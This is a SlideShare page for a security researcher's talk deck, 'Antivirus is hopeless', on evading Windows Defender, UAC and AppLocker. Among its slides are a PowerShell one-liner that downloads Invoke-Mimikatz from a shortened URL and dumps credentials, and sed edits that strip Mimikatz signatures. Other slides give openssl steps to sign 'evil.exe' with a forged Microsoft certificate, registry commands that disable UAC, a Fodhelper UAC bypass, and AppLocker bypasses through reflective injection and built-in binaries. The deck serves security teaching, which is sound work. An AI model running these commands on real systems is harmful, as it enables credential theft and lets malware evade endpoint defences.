SlideShare une entreprise Scribd logo

Antivirus is hopeless

Sumedt Jitpukdebodin
Sumedt Jitpukdebodin

Talk about how to bypass Windows Security such as Windows Defender, UAC, AppLocker

Technologie
1  sur  30
Télécharger pour lire hors ligne
Endpoint protection is not enough. By Sumedt Jitpukdebodin Senior Security Researcher @ I-SECURE
How Antivirus works • Based on heuristic • Based on signature • Based on cloud
Malware Statistics
Distribution of malware under Windows in 2016
TOP 10 file extensions malware Q1 2017
Evasion Techniques • Anti-security techniques (Avoid detection) • Anti-sandbox techniques (Avoid automatic analysis) • Anti-analyst techniques (Avoid analysis)
Anti-security techniques • Obfuscation • Crypter • Packer • FUD (Fully UnDetectable by antimalware) • etc.
Framework for generate bypass antivirus malware • Veil • TheFatRat • Winpayloads • Dr0p1t-Framework • Avet • VBad • Obfuscated Empire • OWASP-ZSC • etc
Invoke-Mimikatz • powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"
Just a Mimikatz • sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1 • sed -i -e '/<#/,/#>/c' Invoke-Mimikatz.ps1 • sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1 • sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1 • sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1 • sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' Invoke-Mimikatz.ps1 • sed -i -e "s/-Win32Functions $Win32Functions$/-Win32Functions $Win32Functions #-/g" Invoke-Mimikatz.ps1
Just a Mimikatz(2) • powershell -exec bypass • Import-Module Invoke-Mimikatz.ps1 • Invoke-Mimidogz
Sign malware with fake certificate • osslsigncode verify <microsoft exe> • openssl req -x509 -newkey rsa:4096 -keyout fake_microsoft_key.pem -out fake_microsoft_cert.pem - days 365 -subj “/C=US/ST=Washington/L=Redmond/ O=Microsoft Corporation/OU=MOPR/CN=Microsoft Corporation” • osslsigncode sign -in evil.exe -key fake_microsoft_key.pem -certs fake_microsoft_cert.pem - out evil_signed.exe
But run EXE is so hard…
Try to use indirect ways • Macro • vbs • DLL • hta (HTML Application) • PS1 • etc.
Example of HTA with vbscript
Show time
Show time (2)
UAC • User Account Control (UAC) • Run with standard user rights instead of full administrator rights • C:WindowsSystem32cmd.exe /k %windir%System32reg.exe ADD HKLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem /v EnableLUA /t REG_DWORD /d 0 /f • C:WindowsSystem32cmd.exe /k %windir%System32reg.exe ADD HKLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem /v EnableLUA /t REG_DWORD /d 1 /f
Bypass UAC • Using mistake of any autoElevate binary (Using sigcheck for check autoElevate flag) • UACME • DLL Hijacking • autoElevate • Elevated COM interface • SDCLT - Backup command • Fodhelper - Manage Optional Features • Using process or dll injection into Windows Publisher Certificate • Using Windows Update Standalone Installer (wusa.exe) • etc.
Bypass UAC with Fodhelper • Fodhelper.exe (%WINDIR%System32fodhelper.exe) • Missing registry • HKCU:SoftwareClassesms-settingsshellopencommand • HKCU:SoftwareClassesms-settingsshellopencommandDelegateExecute • HKCU:SoftwareClassesms-settingsshellopencommand(default)
Show time (3)
AppLocker • Whitelisting application • Executable files, scripts, Windows Installer files, dynamic-link libraries (DLLs), packaged apps, and packaged app installers • Windows 7 > • Single computer (secpol.msc), Group Policy Management (gpmc.msc)
AppLocker File Type • These are regular .exe and .com applications (cmd.exe, ipconfig.exe, etc.) • Windows Installer files (.msi, .msp, .mst), typically used to install a new software on the machine. • Script files with the following extensions .ps1, .vbs, .vba, .cmd and .js. • Packaged Apps installed through the Microsoft Store • DLL files (.dll and .ocx in the advanced tab).
AppLocker Rule • Execution Path • Publisher Information • File Hash
Bypass AppLocker • Find exception path • “C:WindowsTasks” • “C:Windowstracing” • Load file from memory (PowerSploit framework) • $ByteArray = [System.IO.File]::ReadAllBytes(“C:usersricharddesktopmimikatz.exe"); • Invoke-expression(Get-Content .Invoke-ReflectivePEInjection.ps1 |out-string) • Invoke-ReflectivePEInjection -PEBytes $ByteArray • Obfuscate exe for bypass hash • Powershell without powershell (Casey Smith) (Powershell Empire) • Registry Key Manipulation • Run PE file by using microsoft tool • C:windowssystem32rundll32.exe • C:WindowsMicrosoft.NETFrameworkv2.0.50727InstallUtil.exe ( install and uninstall applications via the command prompt) • C:WindowsSystem32regsvr32.exe (Install and Uninstall dll file) • C:WindowsMicrosoft.NETFrameworkv4.0.30319MSBuild.exe (Using to build products in environments where Visual Studio is not installed)
Show time (4)
Protecting against malware • People: Security Awareness Training • Process: Restrict program install or usage with policy, Updates, Backups, Governance, Intelligence, Incident response plan, and more => Security Team • Technology: Technology supports the team and processes • Backup • Antivirus • Anti-ransomware • Endpoint Detection
Q & A
Resource • https://www.blackhillsinfosec.com/?p=5555 • https://github.com/nccgroup/Winpayloads • https://www.youtube.com/watch?v=6bUoz5ChTOs • https://github.com/D4Vinci/Dr0p1t-Framework • https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf • https://www.av-test.org/fileadmin/pdf/security_report/AV-TEST_Security_Report_2016-2017.pdf • https://github.com/Pepitoh/VBad • https://stackoverflow.com/questions/18287960/signing-windows-application-on-linux-based-distros • https://twitter.com/Andrew___Morris/status/879712530041626627 • https://github.com/cobbr/ObfuscatedEmpire • https://pentestlab.blog/tag/uac/ • https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/ • https://www.greyhathacker.net/?p=796 • https://pen-testing.sans.org/resources/papers/gpen/windows-script-host-hack-windows-120189 • https://www.slideshare.net/ThomasRoccia/malware-evasion-techniques • https://www.slideshare.net/CTruncer/the-supporting-role-of-antivirus-evasion-while-persisting • https://github.com/api0cradle/UltimateAppLockerByPassList

Recommandé

Fundamental of malware analysis
Fundamental of malware analysisFundamental of malware analysis
Fundamental of malware analysis
Sumedt Jitpukdebodin
 
Endpoint is not enough
Endpoint is not enoughEndpoint is not enough
Endpoint is not enough
Sumedt Jitpukdebodin
 
CSW2017 chuanda ding_state of windows application security
CSW2017 chuanda ding_state of windows application securityCSW2017 chuanda ding_state of windows application security
CSW2017 chuanda ding_state of windows application security
CanSecWest
 
Csw2016 freingruber bypassing_application_whitelisting
Csw2016 freingruber bypassing_application_whitelistingCsw2016 freingruber bypassing_application_whitelisting
Csw2016 freingruber bypassing_application_whitelisting
CanSecWest
 
Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016
Xavier Ashe
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
Teymur Kheirkhabarov
 
Web security for developers
Web security for developersWeb security for developers
Web security for developers
Sunny Neo
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
Sergey Soldatov
 

Recommandé

Fundamental of malware analysis
Fundamental of malware analysisFundamental of malware analysis
Fundamental of malware analysis
Sumedt Jitpukdebodin
 
Endpoint is not enough
Endpoint is not enoughEndpoint is not enough
Endpoint is not enough
Sumedt Jitpukdebodin
 
CSW2017 chuanda ding_state of windows application security
CSW2017 chuanda ding_state of windows application securityCSW2017 chuanda ding_state of windows application security
CSW2017 chuanda ding_state of windows application security
CanSecWest
 
Csw2016 freingruber bypassing_application_whitelisting
Csw2016 freingruber bypassing_application_whitelistingCsw2016 freingruber bypassing_application_whitelisting
Csw2016 freingruber bypassing_application_whitelisting
CanSecWest
 
Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016
Xavier Ashe
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
Teymur Kheirkhabarov
 
Web security for developers
Web security for developersWeb security for developers
Web security for developers
Sunny Neo
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
Sergey Soldatov
 
CSW2017 Geshev+Miller logic bug hunting in chrome on android
CSW2017 Geshev+Miller logic bug hunting in chrome on androidCSW2017 Geshev+Miller logic bug hunting in chrome on android
CSW2017 Geshev+Miller logic bug hunting in chrome on android
CanSecWest
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
Ross Wolf
 
BSides Roma 2018 - Red team techniques
BSides Roma 2018 - Red team techniquesBSides Roma 2018 - Red team techniques
BSides Roma 2018 - Red team techniques
Guglielmo Scaiola
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
xabean
 
Waf.js: How to Protect Web Applications using JavaScript
Waf.js: How to Protect Web Applications using JavaScriptWaf.js: How to Protect Web Applications using JavaScript
Waf.js: How to Protect Web Applications using JavaScript
Denis Kolegov
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules Coverage
Sunny Neo
 
Implementing ossec
Implementing ossecImplementing ossec
Implementing ossec
Jeronimo Zucco
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
EC-Council
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the Kingdom
Dennis Maldonado
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
Sergey Soldatov
 
The Hunter Games: How to Find the Adversary with Event Query Language
The Hunter Games: How to Find the Adversary with Event Query LanguageThe Hunter Games: How to Find the Adversary with Event Query Language
The Hunter Games: How to Find the Adversary with Event Query Language
Ross Wolf
 
Linux Security, from Concept to Tooling
Linux Security, from Concept to ToolingLinux Security, from Concept to Tooling
Linux Security, from Concept to Tooling
Michael Boelen
 
Hunting For Exploit Kits
Hunting For Exploit KitsHunting For Exploit Kits
Hunting For Exploit Kits
Joe Desimone
 
BlueHat v17 || Down the Open Source Software Rabbit Hole
BlueHat v17 || Down the Open Source Software Rabbit Hole BlueHat v17 || Down the Open Source Software Rabbit Hole
BlueHat v17 || Down the Open Source Software Rabbit Hole
BlueHat Security Conference
 
Fileless Malware Infections
Fileless Malware InfectionsFileless Malware Infections
Fileless Malware Infections
Ramon
 
Taking Hunting to the Next Level: Hunting in Memory
Taking Hunting to the Next Level: Hunting in MemoryTaking Hunting to the Next Level: Hunting in Memory
Taking Hunting to the Next Level: Hunting in Memory
Joe Desimone
 
Malware analysis, threat intelligence and reverse engineering
Malware analysis, threat intelligence and reverse engineeringMalware analysis, threat intelligence and reverse engineering
Malware analysis, threat intelligence and reverse engineering
bartblaze
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
Prakashchand Suthar
 
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CanSecWest
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Priyanka Aash
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat Hunting
GIBIN JOHN
 
how-to-bypass-AM-PPL
how-to-bypass-AM-PPLhow-to-bypass-AM-PPL
how-to-bypass-AM-PPL
nitinscribd
 

Contenu connexe

Tendances

CSW2017 Geshev+Miller logic bug hunting in chrome on android
CSW2017 Geshev+Miller logic bug hunting in chrome on androidCSW2017 Geshev+Miller logic bug hunting in chrome on android
CSW2017 Geshev+Miller logic bug hunting in chrome on android
CanSecWest
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
Ross Wolf
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the Kingdom
Dennis Maldonado
 
The Hunter Games: How to Find the Adversary with Event Query Language
The Hunter Games: How to Find the Adversary with Event Query LanguageThe Hunter Games: How to Find the Adversary with Event Query Language
The Hunter Games: How to Find the Adversary with Event Query Language
Ross Wolf
 
BlueHat v17 || Down the Open Source Software Rabbit Hole
BlueHat v17 || Down the Open Source Software Rabbit Hole BlueHat v17 || Down the Open Source Software Rabbit Hole
BlueHat v17 || Down the Open Source Software Rabbit Hole
BlueHat Security Conference
 
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CanSecWest
 

Tendances (20)

CSW2017 Geshev+Miller logic bug hunting in chrome on android
CSW2017 Geshev+Miller logic bug hunting in chrome on androidCSW2017 Geshev+Miller logic bug hunting in chrome on android
CSW2017 Geshev+Miller logic bug hunting in chrome on android
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
 
BSides Roma 2018 - Red team techniques
BSides Roma 2018 - Red team techniquesBSides Roma 2018 - Red team techniques
BSides Roma 2018 - Red team techniques
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
 
Waf.js: How to Protect Web Applications using JavaScript
Waf.js: How to Protect Web Applications using JavaScriptWaf.js: How to Protect Web Applications using JavaScript
Waf.js: How to Protect Web Applications using JavaScript
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules Coverage
 
Implementing ossec
Implementing ossecImplementing ossec
Implementing ossec
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the Kingdom
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
 
The Hunter Games: How to Find the Adversary with Event Query Language
The Hunter Games: How to Find the Adversary with Event Query LanguageThe Hunter Games: How to Find the Adversary with Event Query Language
The Hunter Games: How to Find the Adversary with Event Query Language
 
Linux Security, from Concept to Tooling
Linux Security, from Concept to ToolingLinux Security, from Concept to Tooling
Linux Security, from Concept to Tooling
 
Hunting For Exploit Kits
Hunting For Exploit KitsHunting For Exploit Kits
Hunting For Exploit Kits
 
BlueHat v17 || Down the Open Source Software Rabbit Hole
BlueHat v17 || Down the Open Source Software Rabbit Hole BlueHat v17 || Down the Open Source Software Rabbit Hole
BlueHat v17 || Down the Open Source Software Rabbit Hole
 
Fileless Malware Infections
Fileless Malware InfectionsFileless Malware Infections
Fileless Malware Infections
 
Taking Hunting to the Next Level: Hunting in Memory
Taking Hunting to the Next Level: Hunting in MemoryTaking Hunting to the Next Level: Hunting in Memory
Taking Hunting to the Next Level: Hunting in Memory
 
Malware analysis, threat intelligence and reverse engineering
Malware analysis, threat intelligence and reverse engineeringMalware analysis, threat intelligence and reverse engineering
Malware analysis, threat intelligence and reverse engineering
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
 
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
 

Similaire à Antivirus is hopeless

WMI - A FRONT DOOR FOR MALWARES
WMI - A FRONT DOOR FOR MALWARESWMI - A FRONT DOOR FOR MALWARES
WMI - A FRONT DOOR FOR MALWARES
Santhosh Kumar
 
Project Malware AnalysisCS 6262 Project 3Agenda.docx
Project Malware AnalysisCS 6262 Project 3Agenda.docxProject Malware AnalysisCS 6262 Project 3Agenda.docx
Project Malware AnalysisCS 6262 Project 3Agenda.docx
briancrawford30935
 

Similaire à Antivirus is hopeless (20)

Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat Hunting
 
how-to-bypass-AM-PPL
how-to-bypass-AM-PPLhow-to-bypass-AM-PPL
how-to-bypass-AM-PPL
 
Building next gen malware behavioural analysis environment
Building next gen malware behavioural analysis environment Building next gen malware behavioural analysis environment
Building next gen malware behavioural analysis environment
 
computer viruses
computer virusescomputer viruses
computer viruses
 
unit 2 confinement techniques.pdf
unit 2 confinement techniques.pdfunit 2 confinement techniques.pdf
unit 2 confinement techniques.pdf
 
CNIT 126 Ch 11: Malware Behavior
CNIT 126 Ch 11: Malware BehaviorCNIT 126 Ch 11: Malware Behavior
CNIT 126 Ch 11: Malware Behavior
 
Deeplook into apt and how to detect and defend v1.0
Deeplook into apt and how to detect and defend v1.0Deeplook into apt and how to detect and defend v1.0
Deeplook into apt and how to detect and defend v1.0
 
CNIT 126 11. Malware Behavior
CNIT 126 11. Malware BehaviorCNIT 126 11. Malware Behavior
CNIT 126 11. Malware Behavior
 
WMI - A FRONT DOOR FOR MALWARES
WMI - A FRONT DOOR FOR MALWARESWMI - A FRONT DOOR FOR MALWARES
WMI - A FRONT DOOR FOR MALWARES
 
Assume Compromise
Assume CompromiseAssume Compromise
Assume Compromise
 
Project Malware AnalysisCS 6262 Project 3Agenda.docx
Project Malware AnalysisCS 6262 Project 3Agenda.docxProject Malware AnalysisCS 6262 Project 3Agenda.docx
Project Malware AnalysisCS 6262 Project 3Agenda.docx
 
You need a PROcess to catch running processes and their modules_v2.0
You need a PROcess to catch running processes and their modules_v2.0You need a PROcess to catch running processes and their modules_v2.0
You need a PROcess to catch running processes and their modules_v2.0
 
MNSEC 2018 - Windows forensics
MNSEC 2018 - Windows forensicsMNSEC 2018 - Windows forensics
MNSEC 2018 - Windows forensics
 
Practical Malware Analysis: Ch 11: Malware Behavior
Practical Malware Analysis: Ch 11: Malware BehaviorPractical Malware Analysis: Ch 11: Malware Behavior
Practical Malware Analysis: Ch 11: Malware Behavior
 
CNIT 152: 12b Windows Registry
CNIT 152: 12b Windows RegistryCNIT 152: 12b Windows Registry
CNIT 152: 12b Windows Registry
 
CNIT 152: 12 Investigating Windows Systems (Part 2 of 3)
CNIT 152: 12 Investigating Windows Systems (Part 2 of 3)CNIT 152: 12 Investigating Windows Systems (Part 2 of 3)
CNIT 152: 12 Investigating Windows Systems (Part 2 of 3)
 
Let's Talk Technical: Malware Evasion and Detection
Let's Talk Technical: Malware Evasion and DetectionLet's Talk Technical: Malware Evasion and Detection
Let's Talk Technical: Malware Evasion and Detection
 
Malware analysis _ Threat Intelligence Morocco
Malware analysis _ Threat Intelligence MoroccoMalware analysis _ Threat Intelligence Morocco
Malware analysis _ Threat Intelligence Morocco
 
Dealing with legacy code
Dealing with legacy codeDealing with legacy code
Dealing with legacy code
 
Mobile platform security models
Mobile platform security modelsMobile platform security models
Mobile platform security models
 

Plus de Sumedt Jitpukdebodin

Plus de Sumedt Jitpukdebodin (12)

How to create your own hack environment
How to create your own hack environmentHow to create your own hack environment
How to create your own hack environment
 
Phishing
PhishingPhishing
Phishing
 
Which side are you
Which side are youWhich side are you
Which side are you
 
Purple team is awesome
Purple team is awesomePurple team is awesome
Purple team is awesome
 
R u hacked
R u hackedR u hacked
R u hacked
 
Web architecture mechanism and threats
Web architecture mechanism and threatsWeb architecture mechanism and threats
Web architecture mechanism and threats
 
Security awareness training
Security awareness trainingSecurity awareness training
Security awareness training
 
Hacking with paper
Hacking with paperHacking with paper
Hacking with paper
 
DDoS handlering
DDoS handleringDDoS handlering
DDoS handlering
 
Incident response before:after breach
Incident response before:after breachIncident response before:after breach
Incident response before:after breach
 
What should I do when my website got hack?
What should I do when my website got hack?What should I do when my website got hack?
What should I do when my website got hack?
 
Web Architecture - Mechanism and Threats
Web Architecture - Mechanism and ThreatsWeb Architecture - Mechanism and Threats
Web Architecture - Mechanism and Threats
 

Dernier

08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
Delhi Call girls
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Drew Madelung
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Igalia
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
giselly40
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
vu2urc
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
Delhi Call girls
 

Dernier (20)

Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 

Antivirus is hopeless

  • 1. Endpoint protection is not enough. By Sumedt Jitpukdebodin Senior Security Researcher @ I-SECURE
  • 2. How Antivirus works • Based on heuristic • Based on signature • Based on cloud
  • 5. TOP 10 file extensions malware Q1 2017
  • 6. Evasion Techniques • Anti-security techniques (Avoid detection) • Anti-sandbox techniques (Avoid automatic analysis) • Anti-analyst techniques (Avoid analysis)
  • 7. Anti-security techniques • Obfuscation • Crypter • Packer • FUD (Fully UnDetectable by antimalware) • etc.
  • 8. Framework for generate bypass antivirus malware • Veil • TheFatRat • Winpayloads • Dr0p1t-Framework • Avet • VBad • Obfuscated Empire • OWASP-ZSC • etc
  • 9. Invoke-Mimikatz • powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"
  • 10. Just a Mimikatz • sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1 • sed -i -e '/<#/,/#>/c' Invoke-Mimikatz.ps1 • sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1 • sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1 • sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1 • sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' Invoke-Mimikatz.ps1 • sed -i -e "s/-Win32Functions $Win32Functions$/-Win32Functions $Win32Functions #-/g" Invoke-Mimikatz.ps1
  • 11. Just a Mimikatz(2) • powershell -exec bypass • Import-Module Invoke-Mimikatz.ps1 • Invoke-Mimidogz
  • 12. Sign malware with fake certificate • osslsigncode verify <microsoft exe> • openssl req -x509 -newkey rsa:4096 -keyout fake_microsoft_key.pem -out fake_microsoft_cert.pem - days 365 -subj “/C=US/ST=Washington/L=Redmond/ O=Microsoft Corporation/OU=MOPR/CN=Microsoft Corporation” • osslsigncode sign -in evil.exe -key fake_microsoft_key.pem -certs fake_microsoft_cert.pem - out evil_signed.exe
  • 13.
  • 14. But run EXE is so hard…
  • 15. Try to use indirect ways • Macro • vbs • DLL • hta (HTML Application) • PS1 • etc.
  • 16. Example of HTA with vbscript
  • 19. UAC • User Account Control (UAC) • Run with standard user rights instead of full administrator rights • C:WindowsSystem32cmd.exe /k %windir%System32reg.exe ADD HKLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem /v EnableLUA /t REG_DWORD /d 0 /f • C:WindowsSystem32cmd.exe /k %windir%System32reg.exe ADD HKLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem /v EnableLUA /t REG_DWORD /d 1 /f
